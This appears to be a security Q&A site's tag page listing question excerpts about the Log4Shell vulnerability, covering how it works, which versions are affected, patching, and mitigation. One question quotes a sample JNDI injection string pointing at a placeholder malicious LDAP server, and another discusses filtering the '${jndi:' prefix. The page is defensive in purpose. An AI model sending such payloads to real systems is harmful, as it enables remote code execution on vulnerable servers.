Questions tagged [log4shell]

Questions about CVE-2021-44228, a vulnerability in the Log4j library allowing remote code execution.

22 questions
Does CVE-2021-44228 impact Log4j ports?

Log4j has been ported to other languages, such as log4perl, log4php, log4net, and log4r. Are these ports vulnerable to CVE-2021-44228 as well? I believe that they aren't because the vulnerability uses JNDI (Java Naming and Directory Interface),…

Asked by Fire Quacker. 86 votes, 3 answers.

How does the log4shell vulnerability work?

Log4shell is making the news. A vulnerability in the widely used logging tool Log4J is putting many servers and even some desktop applications at risk of remote code execution. How does this vulnerability work? What sort of mistake makes it…

Asked by Anders. 70 votes, 1 answer.

Am I protected from Log4j vulnerability if I run Java 8u121 or newer?

According to the notes for CVE-2021-44228 at mitre.org: Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting "com.sun.jndi.rmi.object.trustURLCodebase"…

Asked by Appleoddity. 35 votes, 3 answers.

How can the Log4Shell exploit affect an end user?

I am not an expert in security items and exploits, so I would like to know how this recent Log4Shell exploit can affect me as an end user. Reading the news, the exploit can affect services like "Twitter", "Apple" etc. But what does it mean…

Asked by Alex. 12 votes, 2 answers.

At which OS privilege level does log4j usually run?

Considering that an RCE vulnerability has recently been found in the log4j library, a library used in a lot more applications than I thought, the following question comes to my mind. If an attacker successfully exploits log4shell, does the payload…

Asked by pmbonneau. 6 votes, 3 answers.

Does the log4j RCE vulnerability run even if the message is just a part of the logged string?

Does the JNDI URL need to be the full string being logged or could it be just a part of a logged string? For example, if the code contains: paramGivenFromOutside = "${jndi:ldap://maliciousServer:1389/maliciousApp}"; logger.debug("Request: {}",…

Asked by Lefteris E. 4 votes, 1 answer.

How to find out if an application is vulnerable to log4j?

I am using a Mac for my daily work, but I do not know if I am vulnerable to the log4j exploit. Is there a way to find out? Is there a way to find all the applications that are using Java? How do I protect myself? Update Java? Update the log library?…

Asked by Alex. 3 votes, 1 answer.

Can one protect against the Log4j exploit by sanitizing the parameters?

A zero-day exploit affecting the popular Apache Log4j utility (CVE-2021-44228) was made public on December 9, 2021 that results in remote code execution (RCE). (From an email CloudFlare sent to users) Is a site susceptible to the Log4J exploit if…

3 votes, 1 answer.

How to validate if Log4Shell patch is applied?

Is it enough to upgrade log4j-core and log4j-api to 2.15.0 but leave log4j-slf4j-impl, which is a binding library, at 2.14.1, given that mvn dependency:tree suggests that log4j-slf4j-impl:2.14.1 is depending on log4j-core:2.15.0 and…

Asked by 53c. 3 votes, 1 answer.

Is log4j-over-slf4j vulnerable to log4shell?

On my server, I looked at all files containing log4j, and I only have a log4j-over-slf4j jar file. SLF4J's page about log4shell states the following: If you are using log4j-over-slf4j.jar in conjunction with the SLF4J API, you are safe unless the…

1 vote, 2 answers.

Is removing the `${jndi:` string a mitigation of the log4j security issue?

Recently, the log4j issue got a lot of attention. I run a chatbot web app that is not based on the Java stack. However, there is a backend component that analyzes the chatbot user input which is based on Java. I wonder, to mitigate the log4j issue,…

Asked by Iching Chang. 1 vote, 0 answers.

Should vendors add their CPEs in the log4j NIST entry?

Software that has packaged a vulnerable version of the log4j library is considered vulnerable to CVE-2021-44228 or "log4shell". When I look at the NIST definition I can see that the vulnerable versions of log4j are listed, as well as configurations…

Asked by Neil P. 1 vote, 0 answers.

Log4shell - Should affected servers be "nuked from orbit"?

Considering how log4shell seems trivial to exploit and the important level of control it gives to an attacker, should we wipe everything affected and start over? For example, we find out that a publicly accessible server in production has log4j…

Asked by pmbonneau. 1 vote, 1 answer.

Clarification on log4j Service Requirements

We're currently trying to prioritize our mitigations for CVE-2021-44228. The obvious priority is to deal with any Internet-facing Java (Apache?) applications that use a vulnerable log4j library and/or Java binary first. For multi-user Linux systems,…

1 vote, 0 answers.

Absence of JndiLookup class on vulnerable version number... Log4Shell safe?

If a version of log4j2 is present on a server (say, 2.5 or 2.7) but the JndiLookup class does not exist in any jars, does this mean this specific implementation of log4j2 is not vulnerable to Log4Shell?

Asked by Marcel. 1 vote, 2 answers.
